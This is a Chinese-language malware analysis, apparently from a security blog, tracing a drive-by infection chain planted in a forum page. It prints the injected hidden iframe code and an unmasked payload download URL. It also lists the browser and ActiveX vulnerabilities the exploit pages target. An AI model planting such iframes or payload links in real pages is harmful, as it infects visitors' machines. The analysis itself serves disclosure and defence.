某论坛挂马Worm.Win32.Autorun.eyh

简介: 某论坛挂马Worm.Win32.Autorun.eyh

论坛网页包含代码:

/---

<iframe width='0' height='0' src='hxxp://www.5**4*z**c.cn/1**7aq/q.js'></iframe>

---/

hxxp://www.5**4*z**c.cn/1**7aq/q.js

输出代码:

/---

<IFRaME src="hxxp://m**.sf*s3**wws.cn/03/x4.htm" width=1 height=0></IFRAME>

hxxp://m**.sf*s3**wws.cn/03/x4.htm

包含代码:

/---

<iframe src=google.htm width=100 height=0></Iframe>

---/

hxxp://m**.sf*s3**wws.cn/03/google.htm

采用了一种先前没见过的加密方法,开头一段代码为:

/---

<hTmL><hEaD><Meta Name=Encoder Content=HTMLSHIP>

---/

其功能是:检测浏览器软件类型,如果是IE浏览器,则显示ie.swf,否则显示ff.swf;然后输出代码:

/---

<iframe src=all.htm width=100 height=0></iframe>

---/

hxxp://m**.sf*s3**wws.cn/03/all.htm

采用了相同的加密方法:

用<iframe>引入下列网页,利用漏洞下载hxxp://d1.csygg.com/01/g.exe:

1.htm

利用MS-06014漏洞

kdosn.htm

利用Qvod Player 播放器(clsid:F3D0D36F-23F8-4682-A195-74C92B03D4AF)漏洞

kc.htm

利用Baidu工具条(cLSiD:{A7F05EE4-0426-454F-8013-C41E3596E9E9})漏洞下载hxxp://d1.csygg.com/01/Baidu.cab

newlz.htm

利用联众(GLIEDown.IEDown.1,clsid:F917534D-535B-416B-8E8F-0C04756C31A8)漏洞

s.htm

利用新浪(Downloader.DLoader.1,clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A)漏洞

office.htm

利用MS Office(snpvw.Snapshot Viewer Control.1)漏洞

bf.htm

利用暴风影音(MPS.StormPlayer,)漏洞

cx.htm

利用超星阅览器(Pdg2)漏洞

uu.htm

UUSEE网络电视(UUUPGRADE.UUUpgradeCtrl.1)漏洞

2.htm

利用联众世界(HanGamePluginCn18.HanGamePluginCn18.1)漏洞

3.htm

4.htm

利用RealPlayer(IERPCtl.IERPCtl.1)漏洞

0.htm

利用(clsid:19EFFC12-25FB-479A-A0F2-1569AE1B3365)漏洞

5.htm

利用MS09-002 漏洞


相关文章
|
7月前
|
SQL 数据库
YashanDB归档管理
YashanDB通过归档模式实现redo日志自动归档,支持数据热备份与主备同步。其核心功能包括:配置归档路径(默认$YASDB_DATA/archive)、切换归档模式(ARCHIVELOG/NOARCHIVELOG)、在线日志切换、查看及清理归档日志。归档日志清理支持自动与手动两种方式,自动清理由ARCH_CLEAN_IGNORE_MODE等参数控制,手动清理需指定条件并执行相应SQL语句。这些功能确保数据库在故障时可通过备份与归档日志重建,同时满足高可用需求。
|
Ubuntu Linux
百度搜索:蓝易云【Ubuntu、CentOS修改时区、设置24小时时间格式教程。】
时区和时间格式是操作系统中的两个重要设置,本文将介绍如何在Ubuntu和CentOS操作系统中修改时区和设置24小时时间格式。
1159 0
|
Unix Linux Shell
【Linux】第一篇——基本指令(图示详解)(二)
【Linux】第一篇——基本指令(图示详解)
【Linux】第一篇——基本指令(图示详解)(二)
|
存储 缓存 Oracle
【数据库设计与实现】第1章:空间管理与数据布局
空间管理与数据布局 设计原则数据库设计数据布局和空间管理应当考虑哪些因素呢?又有哪些设计原则?本章先提出问题,看有哪些因素要考虑,然后选取Oracle和MySQL这2款最流行的数据库,看看它们是如何进行空间管理的。我们先看看有哪些因素要考虑:数据最终要反映到持久设备上,空间管理首先要考虑持久设备(如磁盘)的物理特性,考虑如何组织数据才能最大化地发挥存储设备的效率;如何协调平衡多样化的数据,如超大的
【数据库设计与实现】第1章:空间管理与数据布局
|
Java Android开发
Eclipse安装试用Hanlp
【1】确定正确安装配置Java和Eclipse 【2】下载HanLp的各种东西 下载这四个文件到本地,我是放在桌面的一个文件夹了。 【3】 把jar包导入到Eclipse 在Eclipse先新建一个项目File——New——Java Project--[名字:Hanlp], 再按照如下经验来【4】将data.
1359 0
|
存储 缓存 API
AssetBundle基本介绍
翻译自官方文档: https://unity3d.com/cn/learn/tutorials/topics/best-practices/assetbundle-fundamentals 本章讨论AssetBundles。
1423 0
BNUOJ 1006 Primary Arithmetic
Primary Arithmetic 来源:BNUOJ 1006http://www.bnuoj.com/v3/problem_show.php?pid=1006 当你在小学学习算数的时候,老师会教你把两个数由右至左按位加起来。
923 0
|
5天前
|
云安全 人工智能 安全
AI被攻击怎么办?
阿里云提供 AI 全栈安全能力,其中对网络攻击的主动识别、智能阻断与快速响应构成其核心防线,依托原生安全防护为客户筑牢免疫屏障。